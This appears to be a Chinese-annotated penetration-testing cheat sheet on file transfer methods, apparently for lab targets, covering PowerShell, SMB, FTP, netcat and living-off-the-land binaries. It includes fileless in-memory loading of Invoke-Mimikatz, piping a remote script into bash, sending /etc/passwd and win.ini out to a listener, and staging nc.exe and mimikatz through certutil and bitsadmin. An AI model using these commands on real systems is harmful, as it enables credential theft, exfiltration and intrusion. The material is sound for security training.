Web Basic
php -S 0.0.0.0:port             # 0.0.0.0 表示监听主机的所有网络接口
python3 -m http.server [port]   # 默认端口为 8000
ruby -run -e httpd . [-p port]  # 默认端口为 8080
# wget http://ip/file
# curl -O http://ip/file
Nginx PUT
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
/etc/nginx/sites-available/upload.conf
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}
链接到 sites-enabled 目录下
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
启动服务
sudo systemctl restart nginx.service
若端口被占用，可删除默认配置文件
sudo rm /etc/nginx/sites-enabled/default
上传文件
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
ssh
ssh user@host "cat > /path/to/remote/file" < /path/to/local/file   # 上传
ssh user@host "cat /path/to/remote/file" > /path/to/local/file     # 下载
scp
scp file1 file2 user@host:/destination   # 上传
scp user@host:/source /destination       # 下载
-r 递归
-P 指定端口
-v 详细信息
-C 压缩
-o Compression=no 禁止压缩
Powershell Web Download
PS C:\> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1', 'C:\Users\Public\Downloads\PowerView.ps1')
PS C:\> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'C:\Users\Public\Downloads\PowerViewAsync.ps1')
Fileless
PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
Invoke-WebRequest
PS C:\> Invoke-WebRequest -Uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
PS C:\> iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -o PowerView.ps1
PowerShell Session
PowerShell 远程处理会创建 HTTP 和 HTTPS 侦听器。侦听器在默认端口 TCP/5985（HTTP）和 TCP/5986（HTTPS）上运行。使用者需要具有管理访问权限、是 Remote Management Users 组成员，或在会话配置中拥有 PowerShell 远程的明确权限。
target
PS C:\> Test-NetConnection -ComputerName DATABASE01 -Port 5985

ComputerName     : DATABASE01
RemoteAddress    : 192.168.1.101
RemotePort       : 5985
InterfaceAlias   : Ethernet0
SourceAddress    : 192.168.1.100
TcpTestSucceeded : True
host
PS C:\> $Session = New-PSSession -ComputerName DATABASE01
PS C:\> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
PS C:\> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
Base64 Linux encode
base64 shell -w 0   # -w 0, 不换行
echo "<SNIP>" | base64 -d > shell
decode
1 2 3 4 5 6 echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQojIHNwYWNlLg0KIw0KIyBBZGRpdGlvbmFsbHksIGNvbW1lbnRzIChzdWNoIGFzIHRoZXNlKSBtYXkgYmUgaW5zZXJ0ZWQgb24gaW5kaXZpZHVhbA0KIyBsaW5lcyBvciBmb2xsb3dpbmcgdGhlIG1hY2hpbmUgbmFtZSBkZW5vdGVkIGJ5IGEgJyMnIHN5bWJvbC4NCiMNCiMgRm9yIGV4YW1wbGU6DQojDQojICAgICAgMTAyLjU0Ljk0Ljk3ICAgICByaGluby5hY21lLmNvbSAgICAgICAgICAjIHNvdXJjZSBzZXJ2ZXINCiMgICAgICAgMzguMjUuNjMuMTAgICAgIHguYWNtZS5jb20gICAgICAgICAgICAgICMgeCBjbGllbnQgaG9zdA0KDQojIGxvY2FsaG9zdCBuYW1lIHJlc29sdXRpb24gaXMgaGFuZGxlZCB3aXRoaW4gRE5TIGl0c2VsZi4NCiMJMTI3LjAuMC4xICAgICAgIGxvY2FsaG9zdA0KIwk6OjEgICAgICAgICAgICAgbG9jYWxob3N0DQo= | base64 -d > hosts md5sum hosts 3688374325b992def12793500307566d hosts
windows encode
PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
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

PS C:\> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash

Hash
----
3688374325B992DEF12793500307566D
decode
PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("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"))

PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

Algorithm       Hash                                     Path
---------       ----                                     ----
MD5             4E301756A07DED0A2DD6953ABF015278         C:\Users\Public\id_rsa
SMB Impacket smbserver
sudo impacket-smbserver share -smb2support /tmp/smbshare   # 不带 -user/-password 时，共享无需认证即可访问
# or
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Windows
C:\> copy \\192.168.220.133\share\nc.exe

C:\> net use n: \\192.168.220.133\share /user:test test
The command completed successfully.

C:\> copy n:\nc.exe
        1 file(s) copied.
Linux
$ smbclient \\\\192.168.220.133\\share -U test%test
smb: \> recurse ON   # 启用递归模式
smb: \> prompt OFF   # 关闭下载提示
smb: \> mget *
FTP Python3 pyftpdlib
python3 -m pyftpdlib --port 21
Windows
PS C:\> (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
C:\> ftp anonymous@ftp-server
Linux
ftp anonymous@ftp-server
RDP mount linux folder rdesktop
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
xfreerdp
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
connect
mount windows folder
Windows 的 mstsc.exe 远程桌面客户端
Language python
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
php
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
ruby
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
perl
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
nc
nc 10.10.10.10 9001 < file.exe
nc -lp 8000 > file.exe   # 重定向符可颠倒
Encrypted transmission Invoke-AESEncryption.ps1
PS C:\> Import-Module .\Invoke-AESEncryption.ps1
加密
PS C:\> Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt
File encrypted to C:\scan-results.txt.aes

PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/18/2020  12:17 AM           9734 Invoke-AESEncryption.ps1
-a----       11/18/2020  12:19 PM           1724 scan-results.txt
-a----       11/18/2020  12:20 PM           3448 scan-results.txt.aes
<SNIP>
解密
PS C:\> Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\scan-results.aes
openssl 加密（enc 仅提供机密性，不提供完整性校验）
$ openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc encryption password:
解密
$ openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd
enter aes-256-cbc decryption password:
Living off The Land
LOLBAS（Windows）和 GTFOBins（Linux）是可以按功能检索系统自带二进制文件的网站。
LOLBAS
certreq.exe
C:\> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
netcat 接收
$ sudo nc -lvnp 8000
listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)
Content-Length: 92
Host: 192.168.49.128:8000

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Bitsadmin
PS C:\> bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\-student\Desktop\nc.exe
PS C:\> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
Certutil
C:\> certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
GfxDownloadWrapper.exe Windows 10 的英特尔显卡驱动程序
PS C:\> GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
GTFOBins
openssl
$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
Generating a RSA private key
.......................................................................................................+++++
................+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
启动服务
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
在 target 下载文件
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh